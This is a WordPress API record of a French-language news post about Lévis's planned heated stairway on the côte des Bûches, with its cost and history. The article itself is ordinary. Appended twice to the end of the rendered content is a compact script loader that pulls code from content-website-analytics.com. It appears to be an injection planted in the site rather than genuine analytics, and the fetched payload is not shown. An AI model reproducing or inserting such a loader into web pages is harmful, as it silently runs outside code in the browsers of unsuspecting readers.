{"id":16791,"date":"2024-11-22T16:39:21","date_gmt":"2024-11-22T21:39:21","guid":{"rendered":"https:\/\/www.levisurbain.ca\/?p=16791"},"modified":"2025-11-22T09:55:43","modified_gmt":"2025-11-22T14:55:43","slug":"la-cote-des-buches-sera-desormais-chauffee","status":"publish","type":"post","link":"https:\/\/www.levisurbain.ca\/?p=16791","title":{"rendered":"La c\u00f4te des B\u00fbches sera d\u00e9sormais chauff\u00e9e"},"content":{"rendered":"<p>Article de Catherine D&rsquo;Amours. <a href=\"http:\/\/www.journaldelevis.com\/\" rel=\"noopener\" target=\"_blank\">Le Journal de L\u00e9vis<\/a>.<\/p>\n<blockquote><p><strong>Apr\u00e8s plusieurs ann\u00e9es \u00e0 planifier la r\u00e9fection de la c\u00f4te des B\u00fbches, la Ville de L\u00e9vis et le gouvernement du Qu\u00e9bec ont finalement annonc\u00e9 le d\u00e9but des travaux au printemps 2025 pour la r\u00e9alisation d\u2019un nouvel escalier. Les travaux devraient se terminer en 2026.<\/strong><\/p>\n<p>Compos\u00e9 de 140 marches, ce dernier sera \u00e9galement chauff\u00e9 afin d\u2019aider au d\u00e9neigement en p\u00e9riode hivernale. Un dalot y sera install\u00e9 afin de permettre la mont\u00e9e ou la descente de v\u00e9los en plus de quelques endroits am\u00e9nag\u00e9s sur le c\u00f4t\u00e9 pour prendre une pause durant la mont\u00e9e. <\/p>\n<p>C\u2019est un investissement de 4 M$ qui sera effectu\u00e9 par la Ville de L\u00e9vis, incluant une contribution de 1 M$ octroy\u00e9e par la Commission de la capitale nationale du Qu\u00e9bec (CCNQ). <\/p>\n<p><a name=\"more\"><\/a>Le maire de L\u00e9vis, Gilles Lehouillier, a indiqu\u00e9 que ce projet s\u2019inscrit dans la mise en valeur du secteur de la traverse incluant \u00ab la mise en valeur de l\u2019escalier rouge, l\u2019implantation du bureau d\u2019informations touristiques, la r\u00e9fection de la c\u00f4te du Passage et de la c\u00f4te Fr\u00e9chette \u00bb. <\/p>\n<p>Pour l\u2019occasion, le ministre responsable de la r\u00e9gion de la Capitale-Nationale, ministre responsable des Infrastructures et d\u00e9put\u00e9 de Charlesbourg, Jonatan Julien, \u00e9tait pr\u00e9sent, soulignant la pr\u00e9sence de discussions avec le maire Lehouillier en lien avec d\u2019autres projets \u00e0 la suite de la c\u00f4te des B\u00fbches. <\/p>\n<p>Le maire a, entre autres, parl\u00e9 des projets de r\u00e9am\u00e9nagement de la terrasse du chevalier de L\u00e9vis ainsi que pour la refonte d\u2019une passerelle sous le pont de Qu\u00e9bec pour pi\u00e9tons et cyclistes \u00e0 l\u2019endroit de l\u2019ancien pont Garneau. <\/p>\n<p><strong>Mise en valeur historique<\/strong><br \/>\nEn plus de pouvoir utiliser le nouveau lien vers la haute ville de L\u00e9vis, la Ville de L\u00e9vis souhaite que les usagers puissent consulter l\u2019histoire de la c\u00f4te des B\u00fbches dans les aires de repos o\u00f9 des \u00e9l\u00e9ments d\u2019interpr\u00e9tation seront install\u00e9s. <\/p>\n<p>La c\u00f4te des B\u00fbches tire son nom de son appellation populaire en 1831 alors que des b\u00fbches avaient \u00e9t\u00e9 install\u00e9es \u00e0 la verticale dans le sol, \u00e0 cet endroit, afin de permettre la mont\u00e9e des chevaux sur un meilleur appui. <\/p>\n<p>En 1979, la c\u00f4te des B\u00fbches, appel\u00e9e c\u00f4te Labadie, \u00e9tait entour\u00e9e de maisons et de commerces. Apr\u00e8s la d\u00e9molition de ceux-ci, c\u2019est un escalier de b\u00e9ton qui a vu le jour ensuite.  L\u2019escalier Labadie a \u00e9t\u00e9 d\u00e9truit en 2017 pour laisser place au sentier actuel de retour sous le nom de c\u00f4te des B\u00fbches.<\/p><\/blockquote>\n<p><a href=\"http:\/\/www.journaldelevis.com\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" src=\"http:\/\/www.levisurbain.ca\/wp-content\/uploads\/2017\/04\/jdl_logo2012.png\" alt=\"\" \/><\/a><br \/>\nReproduit avec autorisation.<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script><script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Article de Catherine D&rsquo;Amours. <a href=\"http:\/\/www.journaldelevis.com\/\" rel=\"noopener\" target=\"_blank\">Le Journal de L\u00e9vis<\/a>.<\/p>\n<blockquote><p><strong>Apr\u00e8s plusieurs ann\u00e9es \u00e0 planifier la r\u00e9fection de la c\u00f4te des B\u00fbches, la Ville de L\u00e9vis et le gouvernement du Qu\u00e9bec ont finalement annonc\u00e9 le d\u00e9but des travaux au printemps 2025 pour la r\u00e9alisation d\u2019un nouvel escalier. Les travaux devraient se terminer en 2026.<\/strong><\/p>\n<p>Compos\u00e9 de 140 marches, ce dernier sera \u00e9galement chauff\u00e9 afin d\u2019aider au d\u00e9neigement en p\u00e9riode hivernale. Un dalot y sera install\u00e9 afin de permettre la mont\u00e9e ou la descente de v\u00e9los en plus de quelques endroits am\u00e9nag\u00e9s sur le c\u00f4t\u00e9 pour prendre une pause durant la mont\u00e9e. <\/p>\n<p>C\u2019est un investissement de 4 M$ qui sera effectu\u00e9 par la Ville de L\u00e9vis, incluant une contribution de 1 M$ octroy\u00e9e par la Commission de la capitale nationale du Qu\u00e9bec (CCNQ). <\/p>\n<p>Le maire de L\u00e9vis, Gilles Lehouillier, a indiqu\u00e9 que ce projet s\u2019inscrit dans la mise en valeur du secteur de la traverse incluant \u00ab la mise en valeur de l\u2019escalier rouge, l\u2019implantation du bureau d\u2019informations touristiques, la r\u00e9fection de la c\u00f4te du Passage et de la c\u00f4te Fr\u00e9chette \u00bb. <\/p><\/blockquote>\n<p><a href=\"https:\/\/www.levisurbain.ca\/?p=16791#more\">Lire la suite \u00bb<\/a><\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[65,68,60],"tags":[],"class_list":["post-16791","post","type-post","status-publish","format-standard","hentry","category-gouvernement","category-patrimoine","category-transports"],"_links":{"self":[{"href":"https:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts\/16791","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16791"}],"version-history":[{"count":3,"href":"https:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts\/16791\/revisions"}],"predecessor-version":[{"id":24408,"href":"https:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts\/16791\/revisions\/24408"}],"wp:attachment":[{"href":"https:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16791"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}